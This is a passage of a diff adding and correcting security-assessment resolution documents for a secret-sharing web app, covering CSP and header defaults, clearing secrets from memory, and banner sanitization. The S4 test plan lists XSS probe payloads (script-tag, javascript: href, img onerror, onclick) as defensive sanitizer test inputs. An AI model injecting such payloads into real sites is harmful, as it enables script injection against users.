+- [A7 — Reset enumeration + no max password length (Argon2 DoS)](A7-reset-enumeration-password-dos.md)
+- [A8 — 1-day per-account lockout (targeted DoS)](A8-lockout-targeted-dos.md)
+- [D2 — `form-data` 4.0.5 via axios (browser, mitigated)](D2-form-data-axios-cve.md)
+- [D3 — Production source maps shipped/served](D3-production-source-maps.md)
+- [D4 — Caddy proxy image runs as root / unpinned](D4-caddy-image-hardening.md)
+- [D5 — Unauthenticated Redis + host-exposed; RabbitMQ guest:guest](D5-datastore-default-credentials.md)
+- [S3 — Revealed secret not cleared from SPA memory](S3-clear-revealed-secret-from-memory.md)
+
+### Low / Info
+- [C5 — No secret payload size cap (Redis DoS)](C5-secret-payload-size-cap.md)
+- [C6 — Legacy v1 unsalted SHA-256 encryption key (retire)](C6-legacy-v1-encryption-key-retirement.md)
+- [AZ6 — Receipt safe_dump exposes creator owner_id](AZ6-receipt-safe-dump-owner-id.md)
+- [AZ7 — show_invite discloses inviter email + account oracle](AZ7-show-invite-minimize-disclosure.md)
+- [AZ8 — Customer.create! has no allowlist](AZ8-customer-create-allowlist.md) · *needs-validation*
+- [AZ9 — No rate limit on anonymous incoming /secret (emails)](AZ9-incoming-submit-rate-limit.md) · *needs-validation*
+- [P4 — V1 Basic-Auth username enumeration via timing](P4-v1-basicauth-timing-enumeration.md)
+- [P5 — Log injection of Basic-Auth username](P5-v1-log-injection-username.md)
+- [S4 — v-html in GlobalBroadcast (hardening)](S4-global-broadcast-vhtml-hardening.md)
+- [S5 — DNS widget script injected without CSP nonce](S5-dns-widget-script-nonce.md)
+- [OBS1 — SessionDebugger dumps Set-Cookie when enabled](OBS1-session-debugger-header-dump.md)
+
+_38 resolution documents covering every finding in the risk register._

--- a/docs/security/assessment-2026-06-22/resolutions/S1-csp-default-on.md
+++ b/docs/security/assessment-2026-06-22/resolutions/S1-csp-default-on.md
@@ -1,11 +1,23 @@
 # S1 — Content-Security-Policy disabled by default
 
-- **Severity:** High
-- **Status:** Proposed fix
+- **Severity:** High — recalibrated to Medium by 2026-06-24 re-verification (§7)
+- **Status:** Proposed fix — **superseded by re-verification correction (2026-06-24) below**
 - **Affects default config?** **Yes**
 - **Related:** S2 (other security headers), P1. Findings 05, 04 #1.
 - **Primary files:** `etc/defaults/config.defaults.yaml:351-353` (`CSP_ENABLED` default false),
   `apps/api/v1/controllers/helpers.rb:171-208` (policy construction), `lib/onetime/middleware/security.rb`
+
+> **⚠️ Re-verification correction (2026-06-24 blind pass — `RE-VERIFICATION-2026-06-24-independent.md` §5).**
+> The prescribed fix below is **scope-incomplete**: flipping `CSP_ENABLED` only makes the **API v1 JSON app**
+> emit CSP. `apps/api/v1/controllers/helpers.rb:212` is the **sole** CSP writer (confirmed: no
+> `send_csp_headers` call exists anywhere in `lib`/`apps`). The **secret-display HTML pages** — `/secret/*`
+> and `/` → `Core::Controllers::Page#index` — have **no CSP write path**, so the flag flip does **not** cover
+> the very page that renders the secret. The doc's own stated goal is therefore not met by step 1 alone.
+>
+> **Correction:** add a CSP write path on the HTML secret-display routes (emit the same nonce-based policy
+> from the page-render path), not only flip the API flag. Severity **recalibrated High → Medium** (§7):
+> defense-in-depth, no demonstrated XSS sink, nonce infra is already wired — and the flag-flip does not even
+> reach the secret pages.
 
 ## Problem (recap)
 

--- a/docs/security/assessment-2026-06-22/resolutions/S1-csp-default-on.md
+++ b/docs/security/assessment-2026-06-22/resolutions/S1-csp-default-on.md
@@ -1,0 +1,60 @@
+# S1 — Content-Security-Policy disabled by default
+
+- **Severity:** High
+- **Status:** Proposed fix
+- **Affects default config?** **Yes**
+- **Related:** S2 (other security headers), P1. Findings 05, 04 #1.
+- **Primary files:** `etc/defaults/config.defaults.yaml:351-353` (`CSP_ENABLED` default false),
+  `apps/api/v1/controllers/helpers.rb:171-208` (policy construction), `lib/onetime/middleware/security.rb`
+
+## Problem (recap)
+
+CSP is only emitted when `CSP_ENABLED=true`, which defaults to **false**. Confirmed live: `GET
+/api/v2/status` returns **no `Content-Security-Policy`** header (`../evidence/headers_output.txt`). For a
+product whose job is to display secrets, the default install ships without the single strongest
+anti-XSS / data-exfiltration control.
+
+The good news: the policy that *would* be emitted is already strong — nonce-based `script-src`, no
+`unsafe-inline`/`unsafe-eval` for scripts, `default-src 'none'`, `frame-ancestors 'none'`
+(`helpers.rb:176-208`). The fix is to turn it on, not to write it.
+
+## Root cause
+
+Secure-by-default was deferred to opt-in, presumably to avoid breaking custom deployments. The cost is
+that every default deployment is unprotected.
+
+## Prescribed resolution
+
+1. **Flip the default to enabled.** `CSP_ENABLED` defaults `true`; keep the env override so operators
+   with unusual embedding needs can disable it deliberately.
+2. **Verify the nonce path end-to-end** with the SPA build: the server-rendered bootstrap must emit the
+   per-response nonce on every `<script>` (including the rhales bootstrap and the Vite-built entry), and
+   the SPA must not rely on inline event handlers/`unsafe-inline`. Add an automated check that the
+   rendered HTML carries the nonce and no inline script slips through.
+3. **Stage with Report-Only first.** Ship `Content-Security-Policy-Report-Only` (with a report sink) for
+   one release to catch violations in real deployments, then promote to enforcing. This de-risks the
+   default flip without leaving anyone exposed for long.
+4. Reconcile with the DNS-widget inline-script item (finding S5, `useDnsWidget.ts:155-163`) and the
+   `v-html` broadcast (S4) so neither violates the enforced policy (nonce the widget script; both are
+   same-origin/sanitized already).
+
+## Alternatives considered
+
+- **Leave opt-in, document loudly:** rejected — documentation is not a control; the threat model
+  (rendering secrets) demands secure-by-default.
+- **Hash-based instead of nonce-based:** the nonce approach already exists and works with per-response
+  rendering; no need to change strategy.
+
+## Test / verification
+
+- Default boot (no `CSP_ENABLED`) → response carries the strong CSP; `evidence/headers_output.txt`
+  re-run shows it present.
+- SPA smoke test (Playwright) loads/reveals a secret with CSP enforcing and **zero** console CSP
+  violations.
+- Report-Only telemetry shows no legitimate violations before promoting to enforce.
+
+## Effort & risk
+
+- **Effort:** Small to flip; Medium to verify the nonce/inline-script cleanliness across the SPA and
+  rhales templates.
+- **Risk:** Medium if flipped blind — hence the Report-Only staging. Once verified, low.

--- a/docs/security/assessment-2026-06-22/resolutions/S1-csp-default-on.md
+++ b/docs/security/assessment-2026-06-22/resolutions/S1-csp-default-on.md
@@ -10,7 +10,7 @@
 ## Problem (recap)
 
 CSP is only emitted when `CSP_ENABLED=true`, which defaults to **false**. Confirmed live: `GET
-/api/v2/status` returns **no `Content-Security-Policy`** header (`../evidence/headers_output.txt`). For a
+/api/v2/status` returns **no `Content-Security-Policy`** header (`../evidence/headers_output.md`). For a
 product whose job is to display secrets, the default install ships without the single strongest
 anti-XSS / data-exfiltration control.
 
@@ -47,7 +47,7 @@ that every default deployment is unprotected.
 
 ## Test / verification
 
-- Default boot (no `CSP_ENABLED`) → response carries the strong CSP; `evidence/headers_output.txt`
+- Default boot (no `CSP_ENABLED`) → response carries the strong CSP; `evidence/headers_output.md`
   re-run shows it present.
 - SPA smoke test (Playwright) loads/reveals a secret with CSP enforcing and **zero** console CSP
   violations.

--- a/docs/security/assessment-2026-06-22/resolutions/S2-security-headers-default-on.md
+++ b/docs/security/assessment-2026-06-22/resolutions/S2-security-headers-default-on.md
@@ -1,0 +1,61 @@
+# S2 — Clickjacking / HSTS / security headers off by default
+
+- **Severity:** High
+- **Status:** Proposed fix
+- **Affects default config?** **Yes**
+- **Related:** S1 (CSP), P1 (HttpOrigin/CSRF). Findings 05, 04 #1.
+- **Primary files:** `etc/defaults/config.defaults.yaml:314-338`
+  (`http_origin`, `xss_header`, `frame_options`, `strict_transport` all default false),
+  `lib/onetime/middleware/security.rb:76`
+
+## Problem (recap)
+
+`frame_options`, `strict_transport` (HSTS), `http_origin` (origin CSRF), and `xss_header` all default to
+**false**. With CSP also off (S1), a default install ships **neither** `X-Frame-Options` **nor**
+`frame-ancestors` → it is framable/clickjackable, and has **no HSTS** → vulnerable to TLS-stripping/SSL
+downgrade. Confirmed live: `X-Frame-Options` and `Strict-Transport-Security` **absent** on
+`/api/v2/status` (`../evidence/headers_output.txt`). (`X-Content-Type-Options: nosniff`,
+`X-XSS-Protection`, and `Referrer-Policy` *are* present.)
+
+## Root cause
+
+Same as S1: hardening headers are opt-in. `rack-protection` and the middleware support them; the
+defaults just don't enable them.
+
+## Prescribed resolution
+
+Flip the defaults to secure, with operator overrides retained:
+
+1. **`frame_options` → `true`** (emit `X-Frame-Options: DENY` / `SAMEORIGIN`). Combined with CSP
+   `frame-ancestors 'none'` (S1) this gives layered clickjacking protection. Allow an override for the
+   rare legitimate-embedding deployment.
+2. **`strict_transport` → `true`** with a sane `max-age` (e.g. `max-age=31536000; includeSubDomains`).
+   Guard against breaking plain-HTTP local/dev by binding HSTS emission to `SSL=true`/HTTPS requests so
+   it's on in production (TLS) and inert in local HTTP dev.
+3. **`http_origin` → `true`** so Origin/Referer is validated for state-changing requests — this is the
+   default-on partner for P1's CSRF hardening.
+4. **Add `Cross-Origin-Opener-Policy: same-origin`** (and consider `Cross-Origin-Resource-Policy`)
+   — currently absent everywhere — to isolate the secret-bearing window.
+5. `nosniff`/Referrer-Policy are already on; keep them.
+
+All of these are one-line default changes in `config.defaults.yaml` plus the HSTS-on-HTTPS guard.
+
+## Alternatives considered
+
+- **HSTS on unconditionally:** risky for local HTTP/dev and for operators terminating TLS oddly; bind to
+  HTTPS instead.
+- **Rely on the reverse proxy (Caddy) to add headers:** fragile — not every deployment uses the bundled
+  proxy; the app should be safe by itself.
+
+## Test / verification
+
+- Default boot → `X-Frame-Options`, `Strict-Transport-Security` (under HTTPS), origin checks present;
+  re-run `../poc/headers_check.rb` and confirm in `headers_output.txt`.
+- Clickjacking probe: framing the app in a cross-origin iframe is blocked.
+- Dev (HTTP) boot → no HSTS emitted (no dev breakage).
+
+## Effort & risk
+
+- **Effort:** Small (config defaults + HSTS-on-HTTPS guard).
+- **Risk:** Low–Medium. HSTS is sticky in browsers — ship the HTTPS guard and document `max-age`/preload
+  implications. Coordinate `http_origin` flip with P1 so origin-checking and CSRF land together.

--- a/docs/security/assessment-2026-06-22/resolutions/S2-security-headers-default-on.md
+++ b/docs/security/assessment-2026-06-22/resolutions/S2-security-headers-default-on.md
@@ -1,12 +1,27 @@
 # S2 — Clickjacking / HSTS / security headers off by default
 
 - **Severity:** High
-- **Status:** Proposed fix
+- **Status:** Proposed fix — **superseded by re-verification correction (2026-06-24) below**
 - **Affects default config?** **Yes**
 - **Related:** S1 (CSP), P1 (HttpOrigin/CSRF). Findings 05, 04 #1.
 - **Primary files:** `etc/defaults/config.defaults.yaml:314-338`
   (`http_origin`, `xss_header`, `frame_options`, `strict_transport` all default false),
   `lib/onetime/middleware/security.rb:76`
+
+> **⚠️ Re-verification correction (2026-06-24 blind pass — `RE-VERIFICATION-2026-06-24-independent.md` §5).**
+> Verdict: **invalid-evidence** (the code-analysis vuln stands; the "Confirmed live" proof does not exist).
+> The cited `../evidence/headers_output.md` has **no valid HTML-200 capture**: the only `200` is
+> `GET /api/v2/status` (JSON — `X-Frame-Options` never fires on a JSON response even after a fix), and the
+> only HTML-path request, `GET /`, returned **500** from a harness bug
+> (`Rack::Lint::LintError: env variable HTTP_USER_AGENT has non-string value nil`, `headers_output.md:19`).
+> Same file is also the cited S1/S2 evidence, so neither has a live HTML capture.
+>
+> **Corrections:**
+> 1. Re-capture a real HTML `200` (set `HTTP_USER_AGENT` in the probe) before claiming live confirmation.
+> 2. Step 2 (HSTS): the flag-flip as written emits `Strict-Transport-Security` even on plain HTTP — gate
+>    HSTS emission on TLS so it stays inert in HTTP dev.
+> 3. Step 3 (`http_origin`): the flip as written **`:deny`s legitimate cross-origin POSTs** — do not deny
+>    legit cross-origin traffic; allow-list expected origins / coordinate with P1 instead.
 
 ## Problem (recap)
 

--- a/docs/security/assessment-2026-06-22/resolutions/S2-security-headers-default-on.md
+++ b/docs/security/assessment-2026-06-22/resolutions/S2-security-headers-default-on.md
@@ -14,7 +14,7 @@
 **false**. With CSP also off (S1), a default install ships **neither** `X-Frame-Options` **nor**
 `frame-ancestors` → it is framable/clickjackable, and has **no HSTS** → vulnerable to TLS-stripping/SSL
 downgrade. Confirmed live: `X-Frame-Options` and `Strict-Transport-Security` **absent** on
-`/api/v2/status` (`../evidence/headers_output.txt`). (`X-Content-Type-Options: nosniff`,
+`/api/v2/status` (`../evidence/headers_output.md`). (`X-Content-Type-Options: nosniff`,
 `X-XSS-Protection`, and `Referrer-Policy` *are* present.)
 
 ## Root cause
@@ -50,7 +50,7 @@ All of these are one-line default changes in `config.defaults.yaml` plus the HST
 ## Test / verification
 
 - Default boot → `X-Frame-Options`, `Strict-Transport-Security` (under HTTPS), origin checks present;
-  re-run `../poc/headers_check.rb` and confirm in `headers_output.txt`.
+  re-run `../poc/headers_check.rb` and confirm in `headers_output.md`.
 - Clickjacking probe: framing the app in a cross-origin iframe is blocked.
 - Dev (HTTP) boot → no HSTS emitted (no dev breakage).
 

--- a/docs/security/assessment-2026-06-22/resolutions/S3-clear-revealed-secret-from-memory.md
+++ b/docs/security/assessment-2026-06-22/resolutions/S3-clear-revealed-secret-from-memory.md
@@ -1,0 +1,146 @@
+# S3 — Revealed plaintext secret not cleared from SPA memory
+
+- **Severity:** Medium
+- **Status:** Proposed fix
+- **Affects default config?** **No** (behavioral; independent of any config flag)
+- **Related:** S1 (CSP is the control that gates the chained-XSS read this widens). Finding 05 #4.
+- **Primary files:**
+  - `src/shared/stores/secretStore.ts:203-218` (`clear()` / `$reset()` exist, never called from the reveal flow)
+  - `src/shared/components/base/BaseShowSecret.vue:39,50-57` (central reveal container — owns the store via `useSecret`, has `onMounted`/`onBeforeRouteUpdate` but **no** `onBeforeUnmount` cleanup)
+  - `src/apps/secret/composables/useSecretLifecycle.ts:62` (copies `secret_value` into a second `payload` ref — a separate residency point)
+  - `src/apps/secret/components/canonical/SecretDisplayCase.vue:52-66` (copy-to-clipboard handler) and `branded/SecretDisplayCase.vue` (same pattern)
+
+## Problem (recap)
+
+After a recipient reveals a secret, the plaintext is written to the Pinia store
+(`record.value.secret_value`, `secretStore.ts:189`) and stays on the JS heap, reachable through the
+live store, until route teardown, tab close, or GC reclaims it — none of which is explicit or
+prompt. `clear()` and `$reset()` exist (`secretStore.ts:203-218`) but **no component in the
+reveal/display path calls them**: the only `onUnmounted` in the display components removes a resize
+listener (`branded/BaseSecretDisplay.vue:84-86`), and the central container `BaseShowSecret.vue`
+defines `onMounted`/`onBeforeRouteUpdate` (`:50-57`) with no unmount cleanup.
+
+Severity is Medium, not High: reading the residual value still requires code execution in the page
+(which the strict CSP — S1 — is designed to block) and the secret is one-time. The fix narrows the
+window during which a chained XSS, heap dump, or memory-scrape could read an already-revealed value.
+
+## Root cause
+
+The store's lifetime is tied to the Pinia instance (app lifetime), not to the secret's display
+lifetime. Nothing scopes the plaintext to "while the reveal view is mounted." The teardown hook that
+*should* null the value was never wired up, and a second copy of the plaintext (`payload` ref in
+`useSecretLifecycle.ts:62`) compounds the residency.
+
+## Honest limitation (state up front)
+
+JavaScript **cannot guarantee zeroization**. Strings are immutable; setting `record.value = null`
+removes one *reference* but does not scrub the original bytes from the heap — the V8 GC reclaims them
+on its own schedule, and intermediate copies (DOM `<textarea>.value` at
+`canonical/SecretDisplayCase.vue:158`, clipboard, devtools retainers) may persist. The realistic,
+defensible goal is **minimize lifetime and reference count**, not "secure erase." This should be
+stated in the code comments and PR so reviewers don't over-claim. Anything stronger (e.g. holding the
+ciphertext and decrypting into a transient buffer) is out of scope and only marginally better in a
+managed runtime.
+
+## Prescribed resolution
+
+Scope the plaintext to the reveal view's lifetime and drop references as early as the UX allows.
+
+### Implementation steps
+
+1. **Clear the store when the reveal container unmounts.** In `BaseShowSecret.vue` add an
+   `onBeforeUnmount` that calls the store's `clear()`. The container already pulls the store via
+   `useSecret` (`BaseShowSecret.vue:39`); expose the store handle (or call `useSecretStore()`
+   directly) and clear it:
+
+   ```ts
+   // BaseShowSecret.vue <script setup>
+   import { onBeforeUnmount, onMounted } from 'vue';
+   import { useSecretStore } from '@/shared/stores/secretStore';
+
+   const secretStore = useSecretStore();
+   // ...existing useSecret(props.secretIdentifier) wiring...
+
+   onBeforeUnmount(() => {
+     // Best-effort: drop the live reference to the revealed plaintext.
+     // JS cannot guarantee zeroization; this minimizes residency, not eradicates it.
+     secretStore.clear();
+   });
+   ```
+
+   This is the single highest-value change: every reveal path (canonical and branded) renders through
+   `BaseShowSecret`, so one hook covers all of them.
+
+2. **Clear on navigation away within the SPA.** `onBeforeRouteUpdate` (`BaseShowSecret.vue:50-53`)
+   reloads on identifier change but does not clear stale plaintext first. Call `secretStore.clear()`
+   at the top of that handler (before `load()`), and add an `onBeforeRouteLeave` so leaving the
+   reveal route also nulls the value:
+
+   ```ts
+   import { onBeforeRouteLeave, onBeforeRouteUpdate } from 'vue-router';
+
+   onBeforeRouteUpdate((to, from, next) => {
+     secretStore.clear();
+     load();
+     next();
+   });
+   onBeforeRouteLeave((to, from, next) => {
+     secretStore.clear();
+     next();
+   });
+   ```
+
+3. **Eliminate the second copy in `useSecretLifecycle`.** `useSecretLifecycle.ts:62` assigns
+   `payload.value = secretStore.record?.secret_value`, duplicating the plaintext into a ref the store
+   can't clear. Prefer reading through the store/`details` on demand; if `payload` must stay for the
+   state machine, null it in the same teardown path. Confirm current consumers of `useSecretLifecycle`
+   first (`grep` shows it is referenced but verify no view relies on `payload` outliving the store).
+
+4. **Drop the reference after the user is done (optional, UX-gated).** After a successful copy
+   (`SecretDisplayCase.vue:52-66`, both canonical and branded) the value is in the clipboard and the
+   user has what they need; you *may* clear the store then to shorten residency further. Do this only
+   if product accepts that re-copy would require re-reveal (and a one-time secret usually can't be
+   re-revealed anyway). Keep the on-screen `<textarea>` as the source of truth for that session if
+   re-copy must work; otherwise clearing the store while the textarea still holds the value is
+   honest but not a full scrub (see Limitation).
+
+5. **Comment the intent** at `clear()` (`secretStore.ts:203`) and at each call site, stating this is
+   best-effort lifetime minimization, not zeroization, so future maintainers preserve the behavior.
+
+### Alternatives considered
+
+- **Rely on GC / navigation only (status quo):** rejected — residency is unbounded and implicit;
+  a single-page session that never navigates keeps the plaintext indefinitely.
+- **`$reset()` instead of `clear()`:** `$reset()` also flips `apiMode` back to `authenticated` and
+  `_initialized` to `false` (`secretStore.ts:212-218`), which would force a re-`init()` and could
+  reset API mode mid-flow. Use the narrower `clear()` for teardown; reserve `$reset()` for
+  logout/full-reset paths.
+- **Attempt zeroization (overwrite buffers):** rejected — not achievable for JS strings; gives false
+  assurance. Lifetime minimization is the correct, honest control.
+- **Move plaintext out of Pinia into component-local state:** viable and arguably cleaner (ties
+  lifetime to the component automatically), but a larger refactor than wiring teardown into the
+  existing store. Note as a future option; the prescribed fix achieves the same residency window with
+  far less churn.
+
+## Test / verification
+
+- **Unit (store):** extend `src/tests/stores/secretStore.spec.ts` — after `reveal()`, assert
+  `store.record?.secret_value` is set; call `store.clear()`; assert `record`, `details`, `status`
+  are all `null`. (Guards the contract the components depend on.)
+- **Component (teardown):** with Vue Test Utils, mount `BaseShowSecret`, drive a reveal so
+  `record.secret_value` is populated, then `wrapper.unmount()` and assert the store's `record` is
+  `null`. Add a route-leave variant using a mocked router to assert `clear()` fires on
+  `onBeforeRouteLeave`/`onBeforeRouteUpdate`.
+- **Regression:** assert the on-screen reveal still renders the secret before unmount (the clear must
+  not fire while the view is visible).
+- **Manual:** reveal a secret, open devtools → Pinia/Vue panel, confirm `secrets.record` holds the
+  value while displayed and becomes `null` immediately on navigating away or closing the view. Note in
+  the PR that a heap snapshot may still show the bytes until GC — this is the documented JS limitation.
+
+## Effort & risk
+
+- **Effort:** Small. One `onBeforeUnmount` + two route guards in `BaseShowSecret.vue`, optional cleanup
+  of the `useSecretLifecycle` duplicate, plus tests.
+- **Risk:** Low. The main hazard is clearing too eagerly (blanking the display while the user is still
+  reading) — avoided by clearing on **unmount/leave**, not on a timer, and gating the post-copy clear
+  behind product sign-off. No config or server change; behavior is purely client-side.

--- a/docs/security/assessment-2026-06-22/resolutions/S4-global-broadcast-vhtml-hardening.md
+++ b/docs/security/assessment-2026-06-22/resolutions/S4-global-broadcast-vhtml-hardening.md
@@ -1,0 +1,119 @@
+# S4 — `v-html` in GlobalBroadcast (DOMPurify-mitigated)
+
+- **Severity:** Low
+- **Status:** Proposed hardening (defense-in-depth; no active vulnerability)
+- **Affects default config?** **No**
+- **Related:** S1 (the broadcast must render cleanly under the enforced CSP). Finding 05 #5.
+- **Primary files:**
+  - `src/shared/components/ui/GlobalBroadcast.vue:139` (`<span v-html="sanitizedContent"></span>`)
+  - `src/shared/components/ui/GlobalBroadcast.vue:43-47` (`decodeHTMLEntities`)
+  - `src/shared/components/ui/GlobalBroadcast.vue:50-57` (DOMPurify config, `ALLOWED_TAGS: ['a']`)
+  - Content source: `src/shared/layouts/BaseLayout.vue` → `:content="global_banner ?? null"`,
+    read from `bootstrapStore` (`global_banner`, `bootstrap.ts:580`)
+
+## Problem (recap)
+
+The single application-code `v-html` (`GlobalBroadcast.vue:139`) renders the operator-set global
+broadcast banner. Input flows: `global_banner` (server bootstrap, admin/operator-set in Redis) →
+`decodeHTMLEntities()` (`:43-47`, writes to a detached `<textarea>.innerHTML`, reads `.value`) →
+`DOMPurify.sanitize()` with `ALLOWED_TAGS: ['a']`, `ALLOWED_ATTR: ['href','target','rel','class']`
+(`:50-57`) → bound via `v-html`.
+
+This is **not** a user-facing XSS today: the content is operator-controlled, the decode-then-sanitize
+order is correct, and DOMPurify with an anchor-only allowlist strips `<script>`, event-handler
+attributes, and (by default) `javascript:`/`data:` URIs. The risk is residual: a `v-html` sink whose
+safety depends entirely on one library call and a tight config, with an operator-trust assumption.
+
+## Root cause
+
+The banner supports a small amount of rich text (a link), so it is rendered as HTML rather than text.
+That choice introduces an HTML sink that must be kept narrow and must survive future refactors and CSP
+enforcement.
+
+## Prescribed resolution
+
+Keep the sink only if the link feature is required; otherwise remove it. Either way, lock down the
+allowlist and add tests that prove malicious payloads are stripped.
+
+### Implementation steps
+
+1. **Prefer no `v-html` where possible.** If the banner does not actually need an inline anchor,
+   render `props.content` as plain text (`{{ content }}`, which Vue escapes) and delete the DOMPurify
+   path entirely. This removes the sink and the dependency-trust assumption. Confirm with product
+   whether banners ever contain links before choosing this path.
+
+2. **If the anchor is required, keep the sink but harden it.** Retain the existing decode → sanitize →
+   bind order (`:43-57`) and tighten the config:
+   - Enforce safe URL schemes explicitly rather than relying on defaults:
+     ```ts
+     const sanitizeConfig = {
+       ALLOWED_TAGS: ['a'],
+       ALLOWED_ATTR: ['href', 'target', 'rel', 'class'],
+       // Only http/https/mailto; blocks javascript:, data:, vbscript: explicitly.
+       ALLOWED_URI_REGEXP: /^(?:https?|mailto):/i,
+     };
+     ```
+   - Force safe link relations. DOMPurify does not add `rel` for you; use a post-sanitize hook (or a
+     small DOM pass) to set `rel="noopener noreferrer nofollow"` and constrain `target` to `_blank`
+     so an operator-set link can't reach `window.opener`:
+     ```ts
+     DOMPurify.addHook('afterSanitizeAttributes', (node) => {
+       if (node.tagName === 'A' && node.getAttribute('href')) {
+         node.setAttribute('rel', 'noopener noreferrer nofollow');
+         if (node.getAttribute('target')) node.setAttribute('target', '_blank');
+       }
+     });
+     ```
+     Register the hook once at module scope (not per-render) and keep it scoped to this component's
+     sanitize call.
+
+3. **Reconsider `decodeHTMLEntities` (`:43-47`).** Writing operator content to a detached
+   `<textarea>.innerHTML` is safe for a `<textarea>` (its content is treated as text, scripts do not
+   execute), and the result is sanitized afterward. Keep it, but add a comment documenting *why* the
+   order (decode → sanitize → bind) is safe so a future edit doesn't reorder it. If entity decoding is
+   not actually needed for the banner, drop this step to shrink the surface.
+
+4. **Ensure it renders under the enforced CSP (S1).** The strict CSP is `script-src 'nonce-…'` with no
+   `unsafe-inline` for scripts; the broadcast injects **markup**, not scripts, so it is unaffected by
+   `script-src`. Confirm the rendered anchor needs no inline style/handler. With S1's
+   `style-src 'self' 'unsafe-inline'` the `class`-based styling is fine. Add this case to the S1
+   Report-Only telemetry review so a live banner with a link is observed to produce zero CSP
+   violations before promoting to enforce.
+
+5. **Keep DOMPurify current.** Track the `dompurify` dependency (import at `GlobalBroadcast.vue:8`) for
+   upstream security releases; a stale sanitizer is the main way this becomes a real bug.
+
+### Alternatives considered
+
+- **Leave as-is (accept the finding):** defensible given Low severity and operator-only input, but the
+  marginal hardening (explicit URI allowlist + `rel`) is cheap and removes the implicit trust in
+  DOMPurify defaults. Worth doing.
+- **Trusted Types instead of DOMPurify:** S1 notes a commented-out `require-trusted-types-for 'script'`.
+  Trusted Types governs *script* sinks, not `v-html` markup injection, so it does not directly cover
+  this case; DOMPurify remains the right control here. (DOMPurify can produce a `TrustedHTML` if TT is
+  later enforced — keep that in mind, but it is not required for S4.)
+- **Markdown/link-only mini-renderer:** more code than the problem warrants for a single anchor.
+
+## Test / verification
+
+- **Unit (sanitization):** add a `GlobalBroadcast` spec that mounts the component with hostile
+  `content` and asserts the rendered HTML is neutralized. Cover at minimum:
+  - `<script>alert(1)</script>` → no `<script>` in output.
+  - `<a href="javascript:alert(1)">x</a>` → `href` removed/neutralized (no `javascript:`).
+  - `<img src=x onerror=alert(1)>` → element/handler stripped (`<img>` not in allowlist, `onerror`
+    gone).
+  - `<a href="https://evil.example" onclick="alert(1)">x</a>` → `onclick` stripped; `rel` set to
+    `noopener noreferrer nofollow`.
+  - Entity-encoded payload (e.g. `&lt;script&gt;…`) → decoded then sanitized, still inert (guards the
+    decode→sanitize order at `:43-57`).
+  Assert against `wrapper.find('span').html()` / `innerHTML`.
+- **CSP smoke (ties to S1):** with `CSP_ENABLED=true`, render a banner containing a link and confirm
+  **zero** console CSP violations (Playwright), and that the link carries `rel="noopener…"`.
+
+## Effort & risk
+
+- **Effort:** Small. Config tightening + one DOMPurify hook + a focused spec; or smaller still if the
+  banner becomes plain text.
+- **Risk:** Very low. The change only narrows what the sink accepts. The only regression to watch is an
+  operator who relied on a non-http(s)/mailto scheme or a non-anchor tag in a banner — vanishingly rare
+  and arguably desirable to block. Note the `ALLOWED_URI_REGEXP` change in release notes.

--- a/docs/security/assessment-2026-06-22/resolutions/S5-dns-widget-script-nonce.md
+++ b/docs/security/assessment-2026-06-22/resolutions/S5-dns-widget-script-nonce.md
@@ -1,0 +1,125 @@
+# S5 — DNS-widget script injected without a CSP nonce
+
+- **Severity:** Low — **NEEDS-VALIDATION** (confirm at runtime under enforced CSP, and confirm the widget is still in use)
+- **Status:** Proposed fix (conditional on validation)
+- **Affects default config?** **No** today (CSP ships off — S1). Becomes relevant once S1 lands and CSP is enforced.
+- **Related:** S1 (strict nonce-based `script-src` is exactly what would block this). Finding 05 #6.
+- **Primary files:**
+  - `src/shared/composables/useDnsWidget.ts:155-163` (creates `<script>`, sets `script.src = dnsWidgetJs`, appends to `<head>` with **no `nonce`**)
+  - `src/shared/composables/useDnsWidget.ts:14` (vendored asset imported via Vite `?url`: `@/assets/approximated/dnswidget.v1.js`)
+  - `src/apps/workspace/components/domains/DnsWidget.vue:120-122` (the only caller; mounts in the authenticated custom-domain admin flow)
+  - Nonce plumbing: `src/schemas/contracts/bootstrap.ts:589` (`nonce` is in the schema) **but** `src/tests/contracts/bootstrap-schema-contract.spec.ts:44-45` documents it as **intentionally not passed to Vue app state**
+
+## Confirm first
+
+Two things must be verified before implementing, because they change whether any work is needed and which fix applies:
+
+1. **Is the DNS widget still in use?** It is referenced only by `DnsWidget.vue`
+   (`src/apps/workspace/components/domains/DnsWidget.vue`) in the custom-domain admin flow. If
+   custom-domains/the widget have been retired, the fix is to **delete** `useDnsWidget.ts` and the
+   vendored asset, not to nonce it. Confirm with the maintainers first.
+2. **Does it actually break under the strict CSP?** Dynamically-created (non-parser-inserted)
+   `<script>` elements are generally **allowed** under a nonce-based `script-src` even without a
+   nonce — so this may keep working as-is once S1 is enforced. Validate at runtime with
+   `CSP_ENABLED=true`: load the custom-domain page, trigger the widget, and check for a
+   `Refused to load the script … because it violates … Content-Security-Policy` console error. If it
+   loads cleanly, S5 is informational only (still worth the nonce for future-proofing — see below).
+
+## Problem (recap)
+
+`useDnsWidget.loadAssets()` (`useDnsWidget.ts:148-164`) dynamically creates a `<script>`, sets its
+`src` to the Vite-resolved vendored URL, and appends it to `<head>` with no `nonce` attribute. Under
+the strict CSP that S1 turns on (`script-src 'nonce-…'`, no `unsafe-inline`), a *parser-inserted*
+script without a nonce would be blocked; a *programmatically inserted* one usually is not — hence
+NEEDS-VALIDATION. If the policy later adopts `strict-dynamic`, behavior shifts again (then a nonce on
+the inserting context matters more). Today, with CSP off by default, nothing breaks; this is a latent
+issue scoped to the moment S1 ships.
+
+The asset is **vendored same-origin** (not a remote CDN), so this is a functional-compatibility concern
+under CSP, not a third-party-script trust concern. (Separately, the vendored widget uses `innerHTML`
+heavily — `dnswidget.v1.js` — which is its own vendor-code surface to track, but out of scope for S5.)
+
+## Root cause
+
+The widget loader was written to inject its `<script>`/`<link>` imperatively at runtime and predates a
+nonce-aware loading path. The per-response nonce, although present server-side and in the bootstrap
+schema (`bootstrap.ts:589`), is **deliberately not exposed to the Vue app** (`bootstrap-schema-contract.spec.ts:44-45`),
+so the composable has no nonce to attach even if it wanted to.
+
+## Prescribed resolution
+
+Make the injected script CSP-clean once S1 is enforced. Preference order:
+
+### Implementation steps
+
+1. **(Preferred) Load the widget as a bundled module instead of injecting a `<script>` tag.** The asset
+   is already vendored and Vite-resolved (`useDnsWidget.ts:14`). If `dnswidget.v1.js` can be imported as
+   an ES module (dynamic `import()` of the vendored file, or a static import that exposes
+   `window.apxDns`), the script never goes through a runtime `<script>` injection and is covered by the
+   single same-origin bundle that the nonce already authorizes. This removes the CSP question entirely
